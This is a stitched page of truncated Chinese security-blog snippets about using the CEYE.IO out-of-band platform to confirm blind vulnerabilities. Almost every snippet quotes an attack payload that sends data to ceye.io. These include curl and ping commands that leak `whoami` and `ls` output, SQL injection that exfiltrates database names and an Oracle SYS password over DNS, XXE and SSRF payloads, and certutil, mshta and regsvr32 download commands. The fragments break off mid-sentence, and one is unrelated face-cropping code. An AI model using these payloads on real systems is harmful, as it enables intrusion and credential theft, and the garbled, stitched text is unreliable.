作者:xixijun@知道创宇404实验室 1、CEYE 是什么 CEYE是一个用来检测带外(Out-of-Band)流量的监控平台,如DNS查询和HTTP请求。...2、为什么会有CEYE 提到为什么会有CEYE就必须提到它的使用场景了。 有两种常见的情况会导致许多漏洞扫描工具漏扫: 漏洞检测或漏洞利用需要进一步的用户或系统交互。...3、如何使用 登录 CEYE.IO,在用户详情页(http://ceye.io/profile)可以看到自己的域名标识符 identifier,对于每个用户,都有唯一的域名标识符如 abcdef.ceye.io...它的 nameserver address 被设置为自己的服务器IP,因此所有关于ceye.io 的域名的DNS查询最终都会被发送到CEYE的DNS服务器。...4、关于CEYE架构 原ceye的架构: 开发语言:python2.7 Nginx反向代理 后端WEB引擎:Flask ORM:SQLAlchemy 数据库:MySQL 新的CEYE采用了前后端分离架构
的token,用于检测shiro漏洞是否存在,此选项需要配合 -c "ping your.ceye.io" 使用 -u :指定URL python3 shiro-check-rce.py (-c) [-h] [-k] [-t] (-u) 1、漏洞检测 该功能需要你有一个http://ceye.io/的账号,在http://ceye.io/profile...-u http://192.168.175.146:8080/ -c "ping txxxxd.ceye.io" -t 1xxxxxxxxxxxxx6 ?...shiro-check-rce.py -u http://192.168.175.146:8080/ -c "ping txxxxd.ceye.io" -t 1xxxxxxxxxxxxx6 -k kPH...0x03 注意事项 本程序需要 python3 环境以及 java环境 在进行漏洞检测时,-c 指定 ping 的 URL 和 -t 指定的 token 需要是同一 ceye 账户的。
这样的多级域名方式,把我们需要返回的信息链接到url中,然后分析日志,test部分就是我们得到的信息 免费的平台 先推荐一个免费的平台吧,并不是每一个人都会花wb买cloudeye的 http://ceye.io...*nix: curl http://ip.port.b182oj.ceye.io/`whoami` ping `whoami`.ip.port.b182oj.ceye.io ii. windows...Oracle SELECT UTL_INADDR.GET_HOST_ADDRESS('ip.port.b182oj.ceye.io'); SELECT UTL_HTTP.REQUEST('http:/.../ip.port.b182oj.ceye.io/oracle') FROM DUAL; SELECT HTTPURITYPE('http://ip.port.b182oj.ceye.io/oracle'...((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.ip.port.b182oj.ceye.io',80) FROM DUAL; iii.
需要目标机器时windows系统 DnsLog盲注 DnsLog盲注原理 Dnslog平台:http://ceye.io/ http://ceye.io/profile curl mzq83x.ceye.io...curl `whoami`.mzq83x.ceye.io DnsLog盲注方法 核心语法: SELECT LOAD_FILE(CONCAT('\\\\',(select database(...)),'.mysql.r5ourp.ceye.io\\abc')); sql语句不能含有特殊符号 查表 ?...select table_name from information_schema.tables where table_schema=database() limit 0,1),'.mysql.r5oup.ceye.io...select colum_name from information_schema.columns where table_name='users' limit 5,1),'.mysql.r5ourp.ceye.io
然后注册一个ceye.io的账号,作为dns注入的平台 ? ? 用到的东西呢就是下图中画圈的 ?...这是一个域名: 分析一下: Ceye.io 就不用说了, 前面的 xxxx.ceye.io是你的个人域名 Dns注入最后的效果呢就是在xxxx.ceye.io前面显示你注入的结果。...例如: 你得到的数据库是test 那么效果则是:test.xxxx.ceye.io 好的,废话不多说,实例演示 使用到的语句呢就是下面这条: and if((select load_file(concat...('\\\\',(select database()),'.eq6w9l.ceye.io\\abc'))),1,0) 分析一下: And 就不多说了,连接前后语句嘛!...'\\\\',(select database()),'.eq6w9l.ceye.io\\abc' 首先前面的\\\\实际上是两个\其中两个是作为转义符号来的,然后(select database())
这里对原理进行一波总结,并利用了 CEYE 平台 http://ceye.io/ 成功的进行了原理复现利用。...\abc u0ocor.ceye.io 是我申请账号的 dns 解析服务器地址 你的测试账号服务器就会收到 DNS 解析请求,并记录(资源管理器这里不好截图) ?...://ip.port.u0ocor.ceye.io/oracle').GETCLOB() FROM DUAL; SELECT DBMS_LDAP.INIT(('oracle.ip.port.u0ocor.ceye.io...redirect:http://ip.port.u0ocor.ceye.io/%25{3*4} xx.action?...inputFile=http://ip.port.u0ocor.ceye.io/ssrf Discuz http://xxx.xxxx.com/forum.php?
/`whoami` ping `whoami`.ip.port.b182oj.ceye.io #Win下: ping %USERNAME%.b182oj.ceye.io 变量...redirect:http://ip.port.b182oj.ceye.io/%25{3*4} xx.action?...://ip.port.b182oj.ceye.io/oracle').GETCLOB() FROM DUAL; SELECT DBMS_LDAP.INIT(('oracle.ip.port.b182oj.ceye.io...ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test"> %remote;]> 场景六:其他漏洞攻击无回显解决...inputFile=http://ip.port.b182oj.ceye.io/ssrf forum.php?
这里介绍一种方法: curl http://ip.port.b182oj.ceye.io/`whoami` ping `whoami`.ip.port.b182oj.ceye.io 我们可以将回显直接打出来...curl http://ip.port.b182oj.ceye.io/`ls` 显然,我们只打印出了第一行的值: 那么剩余的怎么办?...这里就用到了我们的盲打RCE curl http://ip.port.b182oj.ceye.io/`ls` 然后可以把对方服务器上ls执行的结果返回回来 于是乎经过一番探索发现 cd /var/www...下面就是常规探测了,毕竟没有过滤: 库名:webwebweb.2bub8m.ceye.io 表名:secret.2bub8m.ceye.io 字段名: id.2bub8m.ceye.io name.2bub8m.ceye.io...password.2bub8m.ceye.io 于是查name字段: flag.2bub8m.ceye.io 再查password字段: dn5-1og-can-take-f14g-6as84f.2bub8m.ceye.io
0x01 检测原理 OOB XXE盲攻击,利用ceye监控的http记录,我们再通过ceye给的api进行查询是否有利用XXE漏洞发送的http请求记录。使用如下payload。 ?...0x02 成品展示 首先需要一个ceye账号,将Identifier(用于http请求到你的ceye账户下)和Token(用于API查询你的http请求记录)分别填入到下图的文本框当中,点击保存。
开始使用 使用前请先填写config.py中的server参数 推荐配合http://ceye.io之类的工具使用,server格式为http://xxx.ceye.io 使用方式比较简单,目前支持两种模式...包括requests和socket的timeout server(没有默认值,务必填写): 由于一些exp发送后具体有没有成功需要看服务器是否有数据返回 需要一个服务器来接受这种数据,例如http://ceye.io
,记得将isceye设置为true,然后填上token、ceye.io的地址,保存配置 0x04 如果需要内网dnslog,那么将isceye设置为false, 将内网dnslog填入privatednslogurl...,内网dnslog查看的地址填入privatednsResponseurl,保存配置 2-自定义ceye发现没有效果?...只要配置了ceye,默认dnslog访问不了不会影响结果 4-为什么有些站点检测不出来?...(Dashborad模块内开启) 0x04 可以点击按钮test dnslog delay测试当前环境,如果没有配置ceye和自定义dnslog的话,会使用默认dnslog,但是默认dnslog有时会加载不出来...的平台 0x03 ceyetoken ceye.io的用户token 0x04 ceyednslog ceye.io的用户记录域名 0x05 isuseprivatedns 是否使用自定义dnslog
/`whoami`curl `whoami`.XXXXXX.ceye.ioimage.pngimage.png2.sed如果回显信息不全,可以使用如下结合sed命令令回显完整,但其实也不是全的curl...http://ip.port.XXXXXX.ceye.io/`ls -al|sed -n '2p'`image.png使用base64传输curl http://ip.port.XXXXXX.ceye.io...cmd=curl http://XXXXXX.ceye.io/`ls -al`结果:http://snrkgl.ceye.io/total看起来只能带出第一行,所以我们需要sed命令http://xxx.xxx.xxx.xxx...cmd=curl http://XXXXXX.ceye.io/`ls -al | sed -n '2p'`结果:http://XXXXXX.ceye.io/drwxr-xr-x发现空格不能被带出来,用base64...cmd=curl http://XXXXXX.ceye.io/`ls -al | sed -n '2p'|base64`结果:http://XXXXXX.ceye.io/ZHJ3eHIteHIteCAyIHJvb3Qgcm9vdCA0MDk2IERlYyAyNyAxNDo1OSAuCg
0x02 Dnslog 常用dnslog平台:dnslog.cn、dig.pm、ceye.io,各有利弊吧。当然,如果大家不想用这些免费的也可以通过以下几个开源项目去自行搭建。...而ceye不仅支持dnslog,还支持httplog,可以展示多页数据,所以推荐使用CEYE。....***.ceye.io 0x03 Httplog httplog这种方式可同时探测DNS和HTTP是否都能出网?...CEYE、Burp Collaborator都行,如HTTP能出则大概率可以直接上线,可以用以下几条命令进行测试。...type temp2') do certutil -urlcache -split -f http://192.168.1.120:8888/%i 我们也可以直接用Burp Collaborator或CEYE
其实有现成的服务:http://ceye.io 有一个分配给你的二级域名▲ 在数据库中输入 select load_file(“\\tangxiaofeng.1odz7u.ceye.io\aaa”)...这个帅气的名字▲ 试一下拼接: 首先本地选择一个表 use sqltest; 接着 select load_file(concat(“\\“,(select database()),”.1odz7u.ceye.io
也可以自己手动搭建,工具地址:https://github.com/bugscanteam/dnslog/ 本地环境复现: 在ceye.io申请一个账号 ?...test_user where id =1 union SELECT UTL_HTTP.REQUEST((select pass from test_user where id=1)||'.mdk941.ceye.io...test_user where id =1 union SELECT DBMS_LDAP.INIT((select pass from test_user where id=1)||'.mdk941.ceye.io...from test_user where id =1 union SELECT HTTPURITYPE((select pass from test_user where id=1)||'.mdk941.ceye.io...from test_user where id =1 union SELECT HTTPURITYPE((select pass from test_user where id=1)||'.mdk941.ceye.io
left = int(leye_x - (reye_x - leye_x) * 2) right = int(reye_x + (reye_x - leye_x) * 2) ceye_y...= (leye_y + reye_y) / 2 czb_y = (lzb_y + rzb_y) / 2 top = int(ceye_y - (czb_y - ceye_y) * 2)...bottom = int(czb_y + (czb_y - ceye_y) * 2) th = dh * (right - left) / dw tag = abs(th
言归正传,如果这是一个漏洞点,那我们怎么用呢,最简单的方法,CEYE.IO。CEYE是一个用来检测带外流量的监控平台,如DNS查询和HTTP请求。...这时候使用CEYE平台,通过使用诸如DNS和HTTP之类的带外信道,便可以得到回显信息。...用法也很简单,登录 CEYE.IO,在用户详情页可以看到自己的域名标识符identifier,对于每个用户,都有唯一的域名标识符abcdef.ceye.io 。...所有来自于abcdef.ceye.io 或*.abcdef.ceye.io/ 的DNS查询和HTTP请求都会被记录。通过查看这些记录信息,就可以判断漏洞详情。...那么这种地方,也是可能存在SSRF的,不过当我们输入ceye.io却发现并没有回显请求,这是因为这种地方一般会对后缀做一个检测,如果不是jpg或者其他图片后缀的话并不会通过,不过好在ceye.io是很强大的
curl http://******.ceye.io mshta http://******.ceye.io certutil -urlcache -split -f http://******.ceye.io...regsvr32 /s /n /u /i:http://******.ceye.io scrobj.dll powershell (Invoke-WebRequest -Uri "http://***...***.ceye.io") bitsadmin /rawreturn /transfer n "http://******.ceye.io" "D\1.txt" (2) 查看当前权限 首先测试了以下命令...temp\beacon.exe 查看文件: for+/r+C:\+%i+in+(beacon.exe*)+do+certutil+-urlcache+-split+-f+http://******.ceye.io.../%i 查看路径: for+/F+%i+in+('dir+/b+c:\windows\temp\')+do+certutil+-urlcache+-split+-f+http://******.ceye.io
(要通过dns请求即可通过ping命令,也能通过curl命令,只要对域名进行访问,让域名服务器进行域名解析就可实现) 例:大家可以去ceye.io注册个账号,注册完后会给一个域名,如果有域名解析请求会有记录...我这边得到的域名是wzrtbq.ceye.io,如果我去访问1111111. wzrtbq.ceye.io,那么就会记录下来这个域名解析请求。
领取专属 10元无门槛券
手把手带您无忧上云